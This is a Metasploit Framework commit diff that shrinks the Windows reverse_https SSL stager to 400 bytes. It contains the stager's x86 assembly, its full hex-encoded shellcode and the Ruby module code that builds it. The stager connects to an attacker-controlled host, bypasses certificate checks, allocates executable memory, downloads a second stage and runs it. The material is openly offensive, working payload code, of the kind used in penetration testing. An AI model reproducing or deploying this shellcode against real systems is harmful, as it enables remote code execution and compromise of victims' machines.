Size tweaks to bring the ssl stager + encoder + target_id to exactly 400 bytes
git-svn-id: file:///home/svn/framework3/trunk@8998 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
e4a17dd0ca
commit
c8defe9716
|
|
@ -28,7 +28,7 @@ internetopen:
|
|||
call ebp
|
||||
mov esi, eax ; save the HINTERNET handle
|
||||
|
||||
jmp get_server_host
|
||||
jmp dbl_get_server_host
|
||||
|
||||
internetconnect:
|
||||
pop ebx ; Save the hostname pointer
|
||||
|
|
@ -43,7 +43,6 @@ internetconnect:
|
|||
push esi ; HINTERNET hInternet
|
||||
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
|
||||
call ebp
|
||||
mov esi, eax ; hConnection
|
||||
|
||||
jmp get_server_uri
|
||||
|
||||
|
|
@ -65,19 +64,19 @@ httpopenrequest:
|
|||
push edx ; version
|
||||
push ecx ; url
|
||||
push edx ; method
|
||||
push esi ; hConnection
|
||||
push eax ; hConnection
|
||||
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
|
||||
call ebp
|
||||
mov esi, eax ; hHttpRequest
|
||||
|
||||
httpsendrequest:
|
||||
xor eax, eax
|
||||
push eax ; optional length
|
||||
push eax ; optional
|
||||
push eax ; dwHeadersLength
|
||||
push eax ; headers
|
||||
xor ebx, ebx
|
||||
push ebx ; optional length
|
||||
push ebx ; optional
|
||||
push ebx ; dwHeadersLength
|
||||
push ebx ; headers
|
||||
push esi ; hHttpRequest
|
||||
push 0x7B18062D ; hash( "wininet.dll", "InternetCloseHandleA" )
|
||||
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" )
|
||||
call ebp
|
||||
test eax,eax
|
||||
jnz short allocate_memory
|
||||
|
|
@ -88,23 +87,33 @@ check_ssl:
|
|||
; but its required to use this payload without a valid signed cert.
|
||||
push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" )
|
||||
call ebp
|
||||
cmp eax, 12045 ; ERROR_INTERNET_INVALID_CA
|
||||
cmp al, 0x0d ; ERROR_INTERNET_INVALID_CA (0x2f0d)
|
||||
jne failure
|
||||
|
||||
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
|
||||
set_security_options:
|
||||
push 0x00003380
|
||||
mov eax, esp
|
||||
push 4 ; sizeof(dwFlags)
|
||||
push byte 4 ; sizeof(dwFlags)
|
||||
push eax ; &dwFlags
|
||||
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
|
||||
push esi ; hRequest
|
||||
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
|
||||
call ebp
|
||||
pop eax ; clear temporary storage
|
||||
; pop eax ; clear temporary storage (optional)
|
||||
|
||||
; Try it again
|
||||
jmp short httpsendrequest
|
||||
|
||||
dbl_get_server_host:
|
||||
jmp get_server_host
|
||||
|
||||
get_server_uri:
|
||||
call httpopenrequest
|
||||
|
||||
server_uri:
|
||||
db "/12345", 0x00
|
||||
|
||||
failure:
|
||||
push 0x56A2B5F0 ; hardcoded to exitprocess for size
|
||||
call ebp
|
||||
|
|
@ -113,43 +122,38 @@ allocate_memory:
|
|||
push byte 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push 0x00400000 ; Stage allocation (8Mb ought to do us)
|
||||
push byte 0 ; NULL as we dont care where the allocation is.
|
||||
push ebx ; NULL as we dont care where the allocation is (zero'd from the prev function)
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
|
||||
download_prep:
|
||||
xchg eax, ebx ; place the allocated base address in ebx
|
||||
push ebx ; store a copy of the stage base address on the stack
|
||||
push byte 0 ; temporary storage for bytes read count
|
||||
push ebx ; temporary storage for bytes read count
|
||||
mov edi, esp ; &bytesRead
|
||||
|
||||
download_more:
|
||||
push edi ; &bytesRead
|
||||
push 8192 ; 8k read
|
||||
push ebx ; buffer as the length, seems to work (Win7)
|
||||
push ebx ; buffer
|
||||
push esi ; hRequest
|
||||
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
|
||||
call ebp
|
||||
|
||||
test eax,eax ; download failed?
|
||||
test eax,eax ; download failed? (optional?)
|
||||
|
||||
jz failure
|
||||
|
||||
mov eax, [edi]
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
|
||||
test eax,eax
|
||||
test eax,eax ; optional?
|
||||
jnz download_more ; continue until it returns 0
|
||||
pop eax ; clear the temporary storage
|
||||
|
||||
execute_stage:
|
||||
ret ; dive into the stored stage address
|
||||
|
||||
get_server_uri:
|
||||
call httpopenrequest
|
||||
|
||||
server_uri:
|
||||
db "/123456789", 0x00
|
||||
|
||||
get_server_host:
|
||||
call internetconnect
|
||||
|
||||
|
|
|
|||
|
|
@ -39,7 +39,7 @@ module ReverseHttps
|
|||
[
|
||||
OptString.new('LHOST', [ true, "The local listener hostname" ]),
|
||||
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
||||
OptString.new('TARGETID', [ false, "The ID of this specific payload instance", Rex::Text.rand_text_alphanumeric(8)]),
|
||||
OptString.new('TARGETID', [ false, "The ID of this specific payload instance (4 bytes max)", Rex::Text.rand_text_alphanumeric(4)]),
|
||||
], Msf::Handler::ReverseHttps)
|
||||
end
|
||||
|
||||
|
|
|
|||
|
|
@ -104,7 +104,7 @@ module Payload::Windows::ReflectiveDllInject
|
|||
i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
|
||||
if i
|
||||
t = target_id.to_s
|
||||
raise "Target ID must be less than 9 bytes" if t.length > 8
|
||||
raise "Target ID must be less than 5 bytes" if t.length > 4
|
||||
u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
|
||||
print_status("Patching Target ID #{t} into DLL")
|
||||
dll[i, u.length] = u
|
||||
|
|
|
|||
|
|
@ -34,34 +34,33 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'EXITFUNC' => [ 295, 'V' ],
|
||||
'LPORT' => [ 195, 'v' ], # Not a typo, really little endian
|
||||
'EXITFUNC' => [ 297, 'V' ],
|
||||
'LPORT' => [ 192, 'v' ], # Not a typo, really little endian
|
||||
},
|
||||
'Payload' =>
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
|
||||
"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
|
||||
"\xFF\xD5\x89\xC6\xE9\xBC\x00\x00\x00\x5B\x31\xC9\x51\x51\x6A\x03" +
|
||||
"\x51\x51\x68\x5C\x11\x00\x00\x53\x56\x68\x57\x89\x9F\xC6\xFF\xD5" +
|
||||
"\x89\xC6\xE9\x8E\x00\x00\x00\x59\x31\xD2\x52\x68\x00\x32\xE0\x84" +
|
||||
"\x52\x52\x52\x51\x52\x56\x68\xEB\x55\x2E\x3B\xFF\xD5\x89\xC6\x31" +
|
||||
"\xC0\x50\x50\x50\x50\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75" +
|
||||
"\x2C\x68\xAA\xC5\xE2\x5D\xFF\xD5\x3D\x0D\x2F\x00\x00\x75\x17\x68" +
|
||||
"\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E" +
|
||||
"\x86\xFF\xD5\x58\xEB\xC9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68" +
|
||||
"\x00\x10\x00\x00\x68\x00\x00\x40\x00\x6A\x00\x68\x58\xA4\x53\xE5" +
|
||||
"\xFF\xD5\x93\x53\x6A\x00\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56" +
|
||||
"\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCB\x8B\x07\x01\xC3\x85" +
|
||||
"\xC0\x75\xE5\x58\xC3\xE8\x6D\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35" +
|
||||
"\x36\x37\x38\x39\x00\xE8\x3F\xFF\xFF\xFF"
|
||||
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
|
||||
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
|
||||
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
|
||||
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
|
||||
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
|
||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
|
||||
"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
|
||||
"\xFF\xD5\x89\xC6\xEB\x64\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68" +
|
||||
"\x5C\x11\x00\x00\x53\x56\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x4D\x59" +
|
||||
"\x31\xD2\x52\x68\x00\x32\xE0\x84\x52\x52\x52\x51\x52\x50\x68\xEB" +
|
||||
"\x55\x2E\x3B\xFF\xD5\x89\xC6\x31\xDB\x53\x53\x53\x53\x56\x68\x2D" +
|
||||
"\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x36\x68\xAA\xC5\xE2\x5D\xFF\xD5" +
|
||||
"\x3C\x0D\x75\x24\x68\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A\x1F" +
|
||||
"\x56\x68\x75\x46\x9E\x86\xFF\xD5\xEB\xCD\xEB\x45\xE8\xAE\xFF\xFF" +
|
||||
"\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A" +
|
||||
"\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53" +
|
||||
"\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x53\x53\x56\x68\x12\x96\x89" +
|
||||
"\xE2\xFF\xD5\x85\xC0\x74\xD1\x8B\x07\x01\xC3\x85\xC0\x75\xE9\x58" +
|
||||
"\xC3\xE8\x50\xFF\xFF\xFF"
|
||||
|
||||
}
|
||||
))
|
||||
|
|
@ -77,9 +76,9 @@ module Metasploit3
|
|||
def generate
|
||||
p = super
|
||||
|
||||
i = p.index("/123456789\x00")
|
||||
i = p.index("/12345\x00")
|
||||
u = "/A" + datastore['TARGETID'].to_s + "\x00"
|
||||
raise ArgumentError, "TARGETID can be 8 bytes long at the most" if u.length > 11
|
||||
raise ArgumentError, "TARGETID can be 4 bytes long at the most" if u.length > 7
|
||||
|
||||
p[i, u.length] = u
|
||||
p + datastore['LHOST'].to_s + "\x00"
|
||||
|
|
|
|||
Loading…
Reference in New Issue